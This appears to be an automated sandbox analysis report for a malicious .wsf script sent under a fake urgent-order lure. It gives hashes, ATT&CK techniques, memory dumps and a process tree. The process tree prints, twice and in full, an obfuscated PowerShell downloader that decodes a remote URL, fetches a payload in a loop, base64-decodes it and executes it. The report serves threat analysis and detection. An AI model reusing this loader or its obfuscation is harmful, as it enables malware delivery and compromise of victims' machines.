e8a1cd14d955a2bf92eb706a53adb9b60f1604373e0ad4b746858e51c2082e04

General

Target

PedidourgenteNFVPCI24_4690CLIENTE_JUSTOLOPEZVALCARCELS.A.wsf
Size

8KB
MD5

09d80b7dd70e8951b0cd2de7296e1575
SHA1

240cd08beabcdd4a141586f9dfe5127c9744cdc5
SHA256

e8a1cd14d955a2bf92eb706a53adb9b60f1604373e0ad4b746858e51c2082e04
SHA512

725c767c9429cb90aa257b52340bef96ad28bc3d14bf6f70fce1cd226cce27621158aa14cd2c191244c7be1678a77eddf207044b5014ad11d3f5156ef0e054ff
SSDEEP

192:bkC4m8HBQbYY0JML3Twj/9ZpTT3tv2O3Br7tHuJK7YIGoxS1GsetBkhBTcz:ArhQMYRc/9ZxseZpc1MtBkhi

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	4540	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4256	powershell.exe
4540	powershell.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4540	powershell.exe
4256	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4484	cmd.exe
2460	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2460	PING.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4540	powershell.exe
4540	powershell.exe
4256	powershell.exe
4256	powershell.exe
4256	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	4256	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4780 wrote to memory of 4484	4780	WScript.exe	84
PID 4780 wrote to memory of 4484	4780	WScript.exe	84
PID 4484 wrote to memory of 2460	4484	cmd.exe	86
PID 4484 wrote to memory of 2460	4484	cmd.exe	86
PID 4780 wrote to memory of 4540	4780	WScript.exe	89
PID 4780 wrote to memory of 4540	4780	WScript.exe	89

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PedidourgenteNFVPCI24_4690CLIENTE_JUSTOLOPEZVALCARCELS.A.wsf"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4780
- C:\Windows\System32\cmd.exe
  cmd.exe /c ping aszzzw_6777.6777.6777.677e
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\Windows\system32\PING.EXE
    ping aszzzw_6777.6777.6777.677e
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Snydendes Nonignorant Hilliness Bemixes Forfatterskaber #>;$Usaligt='Containerize';<#Flleshusene Severability Struttede Paralimnion Laanelofters #>;$Legater38=$Overloading+$host.UI;If ($Legater38) {$missenses++;}function Sovevognskonduktr($Kunsthaandvrks){$Radiopraxis=$Reciprocates+$Kunsthaandvrks.'Length'-$missenses; for( $Vandomraadernes=4;$Vandomraadernes -lt $Radiopraxis;$Vandomraadernes+=5){$Upgrowth++;$Jackets+=$Kunsthaandvrks[$Vandomraadernes];$Perau='Strgbutikker';}$Jackets;}function Purprise($Eftersprgendes){ . ($Woak) ($Eftersprgendes);}$Brandenes=Sovevognskonduktr 'SporMFerio Lavz ArbiH,mol KlolVejla,emi/ ki ';$Brandenes+=Sovevognskonduktr 'The,5 til.Nysk0 I a Gla(.eleWDis i Sk nAlmndOlieoWoo,wFaktsAm,u SlupNMasoTMagn Wh 1Cova0Luse. Lit0Cela;Atla AbstWCar,iRetnnSwa,6 Fat4Une,;Brod FaadxGru 6Spir4Di n;Endo a strAbonvFrap:,arb1 nst3 D n1over.Mur 0 ,am)Nonf OratGSikseKlnecb.rykBu koRefu/natt2Lok.0Ha.r1 .re0Para0 Mu 1Nat 0Devo1Vell Lo,hF EeyiGalvrGapeeEmb f beao ,nhxM le/Ko s1 Gra3Para1Bagg.Over0Gulv ';$Forky=Sovevognskonduktr ' UndUPhenSBl.cESh rR Hyp-Uns,AKrongDrife horNLititkoge ';$Renguera=Sovevognskonduktr ' O,yhDemotSheltGuhap Unc: Nur/ rak/ HovgBl haTechrRdslaP.lynDisat onbi edicI vio ronnCarlsH.tctMacar veruGivtc crit De . .mprMilioStof/TravGRevirgranaIntearesbs Es,pFrdirJacknBetagBal tSval.Lu mjT anaReffvAkt aBor. ';$Pernicion=Sovevognskonduktr 'Kuns>Lbeh ';$Woak=Sovevognskonduktr 'Bie IOr aE Ai,xFore ';$Polychotomy65='Follower';$Surpasses181='\Kathlin.Kla';Purprise (Sovevognskonduktr 'unsp$.ilbGFralLProgoneu bDep aUnasLTode:UdsmMHagliUsk sSickdKoldEPengaArbeL AdaI CarNK,mggAfte=Ni k$ ConE Ra NTrivVSkgs:Be raRandp fo P,rihD,agtA HoftImpoAFunk+Maal$GearsJernu NedRBestPA,tia NonSSwapsPreme alsPras1Pr f8Ankr1Unre ');Purprise (Sovevognskonduktr 'Opla$GoffGFuldLForbO SekbSlidA LftL.enm:LiniK MoroTranN RheFTomlIBargGIn euSk irStraaFlaftGiltiBomuOFinenB skSExa PBetrr FjeOOppoGHensRForsaHumomstriM MeaEIde.TR ge=E,bo$NonsR ,arE UsknBi,pGE,heuNonfeV rtr BetA Hkk.SubssOverPPer.LPerfiFrditFarv(B lb$OprepQu lE .onrMa rnRhabiFl sCplasI UdvoInfiNAl.m)Nico ');Purprise (Sovevognskonduktr 'Moon[UigeNFlybeForsT Hym.Absusbui E JairFlasVM lli Thec eneQuadP NonOSem.iSedinMaantKronmReckAInten rifaUrneGStrse CroRBred]Quip:Indi:BeneSGrinE Oc.CUrinuNonoR kniiArseTSproY Pa pMon.rklovOposttEquioPjeccTal oDjavlBaa, San =Weig ele[g.edN AarEFeltTDiss.Hy rs MileLinecZachuSilpRNed,ITilhTChawYBiavPTrearMaanoregitDo,toHenfCefteOIn,sL BartBr gyAfatpStyrEMili] ek:Orph:MarxTPh.sl IndSimpr1ov r2V.dl ');$Renguera=$Konfigurationsprogrammet[0];$Kreturs=(Sovevognskonduktr 'Unre$D,meG ivsL layODialbamphapaveL,eci:HgesK ShiA TarPO faeOv lrNo psPersb estU.genSMiljKEncy1 nft0Stil6Myto=KvilNSlimesterwShai- esO BurBunaljRenle GluCReveT Stb DandS OveYBentsOrtht inie FulMUl.r.Afkrn DegeWeigtMods.KlovWThotE oosB .emc LurLHo jIBankEAttaN CenTInd ');Purprise ($Kreturs);Purprise (Sovevognskonduktr ' orb$FartK ,ora.redp voteGa drNonpsVer b LonuFiktsRealk Non1Bra,0Sinn6Styr. dsgHAlm eMin aLngod VseeForlrNettsUlna[Kram$ ,daFSessolk.erAposkC lcy ons] Gen=,ing$DissBDei rYannamil.nAuridAnmieDesinPed eFingsTric ');$Snerydningens=Sovevognskonduktr 'genf$S udKSensa St pHjemeLr mrVselsAmtsbLingu Pens.udekLe i1Hype0Sl c6Enum.S rvDGr no ilvwRougnwintlPukloSup aPle dGnidFA viiMa al P.eeM sp( pe$ EngRFataeCir nKiwigMagnu dese StorCar.aSyne,Hubb$.stgS UnpkLib gsk.ilgrana MenvKa asSejl)Taki ';$Skglavs=$Misdealing;Purprise (Sovevognskonduktr ' Ins$ LkkGVidelI,dsO FrobforsAIn ulMath:Str TKnivvUme ASprrn O cGFalsSSel.FSamfj eroEOpkar ClaN vigeBio,lR diS El E KonnNoniSJ.nv= F.r( esst DageGodssH rmtPrea-Ind.PIchoAdrysT Genh Mil Svip$Glans .olK vrmG Gu l SysaSalaV atS N.d) Asy ');while (!$Tvangsfjernelsens) {Purprise (Sovevognskonduktr 'ung $UnclgPretlDefioSkolbUnchaT ollBygg:struAH.mitHemitviv.rFluoa euaN rcekarbtRepe=Orth$ .lit orrbarauconcefjel ') ;Purprise $Snerydningens;Purprise (Sovevognskonduktr ' FalsN neT araALigeR VelTAmga-tot.sLikvl M cEHemmEHirsPBrol Mor.4 Str ');Purprise (Sovevognskonduktr 'Rets$StikgOrchlLy hOMu sbkanaAHe,lL Phy: .phtDep.VSlavADmniN iagTaa,sM seFWeasJ PyrE Kl.RReabnUn eeWarmlDiagSSindEsvveNulrisA be= Dis(Sti TBikee ndaSTrilTRe,s-.akePEtataToottHaplHVer Acet$SnicsRetrkSugeG FliljesuAsaveVUndeSDi,l)Gazo ') ;Purprise (Sovevognskonduktr 'Copp$ GosgB ltlplato FerBSkovASkrdlSkov:Su eb UnmI Ndbo.upllPaddOR stG ReseTer R orbsUd,p=Sted$DiscGTok LStuboV.lmb P,eaSagsLLegl:Matzo VanuGemsGBibeH mldT kyIJaspNFo.sG,hmo+ ool+Mand% ,ld$TyrekUnlaO .ugNAf ifFolkI N,dGGurguImprRk,miAYardtHighISpytoBambnDisesBr,ep FysrKre.O,ncagprotRBoarA eimEndem Ni ESpentThai.PeisCBipooEfteU reNsubpT Bla ') ;$Renguera=$Konfigurationsprogrammet[$Biologers];}$Whinberries=318845;$Skyskrabers103=30434;Purprise (Sovevognskonduktr 'fase$NaivgMim.lGemiOPa eBSke aFor lDi e:I pip leeE iabN.kytiB.udS,retSreviEEuthNC.ne Luxu=Para ProGUndeEFordTBold-AnisCgrano vernDeatt HexeThioNcathTNon Capt$ K ts orsKPlafgnotuL IndA te,VUnpospse ');Purprise (Sovevognskonduktr 'Prea$LobsgCloclDes.oPri b SleaS oilVari:dentSDelopStraeSup cAlliiInobfB,lliD.nictudea.ilvl CapnTr leTa dsTorosKon Bo m=You Bi e[St kSBiomySyn.sga,lt T,ee.dskmAuto. umiCParloFyrin PrevRaches ovrNom,tSome]Der,:Irel:PyrhF I drD.caoPloum DalBFl taTrausTapie Obc6Soci4AkseSPoe.tPrivrte.li PrynHibegCre.( Aks$ BriP befeBalnnKortiRepes co sLaereOvernsulp) Cha ');Purprise (Sovevognskonduktr 'Inte$ emg ,atl dipOHumob K iaTffeLdi,h:UndegH emEForpNConsO lnP B sRPropEAalet Part Aste MandT.ateFnomSO er Ma r=c te Svk[JettSInt yBonaSNongt tefE In mFord. umtJ neeBrisXSam,TM.ta.GlanePrseNAmbrCAnt o Fr.D K mi.upenSyvtGAnlb]Byza:Natt:TaktAGalos aurcla.ci S.aiStng. VarG CanEGridt.ndis sont ollRRomaiLyspNUn,eGSwi,( ata$ PosSHe spKadde Medc UnlIA idfDe rIReoxCDetaAPasslCansN ba e RepSBogssUnca)Aan. ');Purprise (Sovevognskonduktr 'Eksi$BolsGBarbLGenio olbTaleABedmLBund:FleraIsenDOverDAmyleUnoprParasUdde=Opti$AttrgUdh e,capnAn iO CubP ,riR S,pEAde,TTaalt Ud.eA,todSenneMatrsDe a. Ales AktuStudBMsteS.solTGrinrSmuti UpbnindbG Ove(Foru$HilsWcounHMasciLuftn ndebSeriePinkrstagrSk.rIfejlESil SVehm, Reg$EksosOprekUdsayNeedsHamiKCleir S.ua .eaBauguE esiRRe,isansk1anvi0 Brk3Styr) la ');Purprise $Adders;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Snydendes Nonignorant Hilliness Bemixes Forfatterskaber #>;$Usaligt='Containerize';<#Flleshusene Severability Struttede Paralimnion Laanelofters #>;$Legater38=$Overloading+$host.UI;If ($Legater38) {$missenses++;}function Sovevognskonduktr($Kunsthaandvrks){$Radiopraxis=$Reciprocates+$Kunsthaandvrks.'Length'-$missenses; for( $Vandomraadernes=4;$Vandomraadernes -lt $Radiopraxis;$Vandomraadernes+=5){$Upgrowth++;$Jackets+=$Kunsthaandvrks[$Vandomraadernes];$Perau='Strgbutikker';}$Jackets;}function Purprise($Eftersprgendes){ . ($Woak) ($Eftersprgendes);}$Brandenes=Sovevognskonduktr 'SporMFerio Lavz ArbiH,mol KlolVejla,emi/ ki ';$Brandenes+=Sovevognskonduktr 'The,5 til.Nysk0 I a Gla(.eleWDis i Sk nAlmndOlieoWoo,wFaktsAm,u SlupNMasoTMagn Wh 1Cova0Luse. Lit0Cela;Atla AbstWCar,iRetnnSwa,6 Fat4Une,;Brod FaadxGru 6Spir4Di n;Endo a strAbonvFrap:,arb1 nst3 D n1over.Mur 0 ,am)Nonf OratGSikseKlnecb.rykBu koRefu/natt2Lok.0Ha.r1 .re0Para0 Mu 1Nat 0Devo1Vell Lo,hF EeyiGalvrGapeeEmb f beao ,nhxM le/Ko s1 Gra3Para1Bagg.Over0Gulv ';$Forky=Sovevognskonduktr ' UndUPhenSBl.cESh rR Hyp-Uns,AKrongDrife horNLititkoge ';$Renguera=Sovevognskonduktr ' O,yhDemotSheltGuhap Unc: Nur/ rak/ HovgBl haTechrRdslaP.lynDisat onbi edicI vio ronnCarlsH.tctMacar veruGivtc crit De . .mprMilioStof/TravGRevirgranaIntearesbs Es,pFrdirJacknBetagBal tSval.Lu mjT anaReffvAkt aBor. ';$Pernicion=Sovevognskonduktr 'Kuns>Lbeh ';$Woak=Sovevognskonduktr 'Bie IOr aE Ai,xFore ';$Polychotomy65='Follower';$Surpasses181='\Kathlin.Kla';Purprise (Sovevognskonduktr 'unsp$.ilbGFralLProgoneu bDep aUnasLTode:UdsmMHagliUsk sSickdKoldEPengaArbeL AdaI CarNK,mggAfte=Ni k$ ConE Ra NTrivVSkgs:Be raRandp fo P,rihD,agtA HoftImpoAFunk+Maal$GearsJernu NedRBestPA,tia NonSSwapsPreme alsPras1Pr f8Ankr1Unre ');Purprise (Sovevognskonduktr 'Opla$GoffGFuldLForbO SekbSlidA LftL.enm:LiniK MoroTranN RheFTomlIBargGIn euSk irStraaFlaftGiltiBomuOFinenB skSExa PBetrr FjeOOppoGHensRForsaHumomstriM MeaEIde.TR ge=E,bo$NonsR ,arE UsknBi,pGE,heuNonfeV rtr BetA Hkk.SubssOverPPer.LPerfiFrditFarv(B lb$OprepQu lE .onrMa rnRhabiFl sCplasI UdvoInfiNAl.m)Nico ');Purprise (Sovevognskonduktr 'Moon[UigeNFlybeForsT Hym.Absusbui E JairFlasVM lli Thec eneQuadP NonOSem.iSedinMaantKronmReckAInten rifaUrneGStrse CroRBred]Quip:Indi:BeneSGrinE Oc.CUrinuNonoR kniiArseTSproY Pa pMon.rklovOposttEquioPjeccTal oDjavlBaa, San =Weig ele[g.edN AarEFeltTDiss.Hy rs MileLinecZachuSilpRNed,ITilhTChawYBiavPTrearMaanoregitDo,toHenfCefteOIn,sL BartBr gyAfatpStyrEMili] ek:Orph:MarxTPh.sl IndSimpr1ov r2V.dl ');$Renguera=$Konfigurationsprogrammet[0];$Kreturs=(Sovevognskonduktr 'Unre$D,meG ivsL layODialbamphapaveL,eci:HgesK ShiA TarPO faeOv lrNo psPersb estU.genSMiljKEncy1 nft0Stil6Myto=KvilNSlimesterwShai- esO BurBunaljRenle GluCReveT Stb DandS OveYBentsOrtht inie FulMUl.r.Afkrn DegeWeigtMods.KlovWThotE oosB .emc LurLHo jIBankEAttaN CenTInd ');Purprise ($Kreturs);Purprise (Sovevognskonduktr ' orb$FartK ,ora.redp voteGa drNonpsVer b LonuFiktsRealk Non1Bra,0Sinn6Styr. dsgHAlm eMin aLngod VseeForlrNettsUlna[Kram$ ,daFSessolk.erAposkC lcy ons] Gen=,ing$DissBDei rYannamil.nAuridAnmieDesinPed eFingsTric ');$Snerydningens=Sovevognskonduktr 'genf$S udKSensa St pHjemeLr mrVselsAmtsbLingu Pens.udekLe i1Hype0Sl c6Enum.S rvDGr no ilvwRougnwintlPukloSup aPle dGnidFA viiMa al P.eeM sp( pe$ EngRFataeCir nKiwigMagnu dese StorCar.aSyne,Hubb$.stgS UnpkLib gsk.ilgrana MenvKa asSejl)Taki ';$Skglavs=$Misdealing;Purprise (Sovevognskonduktr ' Ins$ LkkGVidelI,dsO FrobforsAIn ulMath:Str TKnivvUme ASprrn O cGFalsSSel.FSamfj eroEOpkar ClaN vigeBio,lR diS El E KonnNoniSJ.nv= F.r( esst DageGodssH rmtPrea-Ind.PIchoAdrysT Genh Mil Svip$Glans .olK vrmG Gu l SysaSalaV atS N.d) Asy ');while (!$Tvangsfjernelsens) {Purprise (Sovevognskonduktr 'ung $UnclgPretlDefioSkolbUnchaT ollBygg:struAH.mitHemitviv.rFluoa euaN rcekarbtRepe=Orth$ .lit orrbarauconcefjel ') ;Purprise $Snerydningens;Purprise (Sovevognskonduktr ' FalsN neT araALigeR VelTAmga-tot.sLikvl M cEHemmEHirsPBrol Mor.4 Str ');Purprise (Sovevognskonduktr 'Rets$StikgOrchlLy hOMu sbkanaAHe,lL Phy: .phtDep.VSlavADmniN iagTaa,sM seFWeasJ PyrE Kl.RReabnUn eeWarmlDiagSSindEsvveNulrisA be= Dis(Sti TBikee ndaSTrilTRe,s-.akePEtataToottHaplHVer Acet$SnicsRetrkSugeG FliljesuAsaveVUndeSDi,l)Gazo ') ;Purprise (Sovevognskonduktr 'Copp$ GosgB ltlplato FerBSkovASkrdlSkov:Su eb UnmI Ndbo.upllPaddOR stG ReseTer R orbsUd,p=Sted$DiscGTok LStuboV.lmb P,eaSagsLLegl:Matzo VanuGemsGBibeH mldT kyIJaspNFo.sG,hmo+ ool+Mand% ,ld$TyrekUnlaO .ugNAf ifFolkI N,dGGurguImprRk,miAYardtHighISpytoBambnDisesBr,ep FysrKre.O,ncagprotRBoarA eimEndem Ni ESpentThai.PeisCBipooEfteU reNsubpT Bla ') ;$Renguera=$Konfigurationsprogrammet[$Biologers];}$Whinberries=318845;$Skyskrabers103=30434;Purprise (Sovevognskonduktr 'fase$NaivgMim.lGemiOPa eBSke aFor lDi e:I pip leeE iabN.kytiB.udS,retSreviEEuthNC.ne Luxu=Para ProGUndeEFordTBold-AnisCgrano vernDeatt HexeThioNcathTNon Capt$ K ts orsKPlafgnotuL IndA te,VUnpospse ');Purprise (Sovevognskonduktr 'Prea$LobsgCloclDes.oPri b SleaS oilVari:dentSDelopStraeSup cAlliiInobfB,lliD.nictudea.ilvl CapnTr leTa dsTorosKon Bo m=You Bi e[St kSBiomySyn.sga,lt T,ee.dskmAuto. umiCParloFyrin PrevRaches ovrNom,tSome]Der,:Irel:PyrhF I drD.caoPloum DalBFl taTrausTapie Obc6Soci4AkseSPoe.tPrivrte.li PrynHibegCre.( Aks$ BriP befeBalnnKortiRepes co sLaereOvernsulp) Cha ');Purprise (Sovevognskonduktr 'Inte$ emg ,atl dipOHumob K iaTffeLdi,h:UndegH emEForpNConsO lnP B sRPropEAalet Part Aste MandT.ateFnomSO er Ma r=c te Svk[JettSInt yBonaSNongt tefE In mFord. umtJ neeBrisXSam,TM.ta.GlanePrseNAmbrCAnt o Fr.D K mi.upenSyvtGAnlb]Byza:Natt:TaktAGalos aurcla.ci S.aiStng. VarG CanEGridt.ndis sont ollRRomaiLyspNUn,eGSwi,( ata$ PosSHe spKadde Medc UnlIA idfDe rIReoxCDetaAPasslCansN ba e RepSBogssUnca)Aan. ');Purprise (Sovevognskonduktr 'Eksi$BolsGBarbLGenio olbTaleABedmLBund:FleraIsenDOverDAmyleUnoprParasUdde=Opti$AttrgUdh e,capnAn iO CubP ,riR S,pEAde,TTaalt Ud.eA,todSenneMatrsDe a. Ales AktuStudBMsteS.solTGrinrSmuti UpbnindbG Ove(Foru$HilsWcounHMasciLuftn ndebSeriePinkrstagrSk.rIfejlESil SVehm, Reg$EksosOprekUdsayNeedsHamiKCleir S.ua .eaBauguE esiRRe,isansk1anvi0 Brk3Styr) la ');Purprise $Adders;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

Query Registry

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d336b18e0e02e045650ac4f24c7ecaa7

SHA1
87ce962bb3aa89fc06d5eb54f1a225ae76225b1c

SHA256
87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27

SHA512
e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m11gdaqv.ywe.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Kathlin.Kla

Filesize
454KB

MD5
ab859a07435423248d1622275f9bd85a

SHA1
0ea0c3f44c374b68e1ec848ca9ecbcbdab27a72b

SHA256
9c22b17db4188ec2167840b9aa43b5ca54d39af7c0c7f992632e6b3ef1ad1653

SHA512
dff361490169eb1b42936a8f5f49030a6b1484691ff60c13d3b087735fca4c3630dc1c8c065e4a65f461e0a13d2cb689a9d1b691c88dd4eff26eb4775160ba1c

Download Submit
memory/4256-36-0x0000000005AD0000-0x0000000005B1C000-memory.dmp

Filesize
304KB

Download
memory/4256-33-0x00000000055B0000-0x0000000005904000-memory.dmp

Filesize
3.3MB

Download
memory/4256-43-0x00000000084F0000-0x000000000B347000-memory.dmp

Filesize
46.3MB

Download
memory/4256-41-0x0000000007F40000-0x00000000084E4000-memory.dmp

Filesize
5.6MB

Download
memory/4256-19-0x0000000000D20000-0x0000000000D56000-memory.dmp

Filesize
216KB

Download
memory/4256-20-0x0000000004CE0000-0x0000000005308000-memory.dmp

Filesize
6.2MB

Download
memory/4256-21-0x0000000004BB0000-0x0000000004BD2000-memory.dmp

Filesize
136KB

Download
memory/4256-22-0x0000000004C60000-0x0000000004CC6000-memory.dmp

Filesize
408KB

Download
memory/4256-23-0x0000000005380000-0x00000000053E6000-memory.dmp

Filesize
408KB

Download
memory/4256-40-0x0000000006CC0000-0x0000000006CE2000-memory.dmp

Filesize
136KB

Download
memory/4256-39-0x0000000006D30000-0x0000000006DC6000-memory.dmp

Filesize
600KB

Download
memory/4256-35-0x0000000005A90000-0x0000000005AAE000-memory.dmp

Filesize
120KB

Download
memory/4256-38-0x0000000006040000-0x000000000605A000-memory.dmp

Filesize
104KB

Download
memory/4256-37-0x0000000007310000-0x000000000798A000-memory.dmp

Filesize
6.5MB

Download
memory/4540-0-0x00007FFC6E183000-0x00007FFC6E185000-memory.dmp

Filesize
8KB

Download
memory/4540-11-0x00007FFC6E180000-0x00007FFC6EC41000-memory.dmp

Filesize
10.8MB

Download
memory/4540-12-0x00007FFC6E180000-0x00007FFC6EC41000-memory.dmp

Filesize
10.8MB

Download
memory/4540-18-0x00007FFC6E180000-0x00007FFC6EC41000-memory.dmp

Filesize
10.8MB

Download
memory/4540-1-0x0000026364530000-0x0000026364552000-memory.dmp

Filesize
136KB

Download
memory/4540-15-0x00007FFC6E180000-0x00007FFC6EC41000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads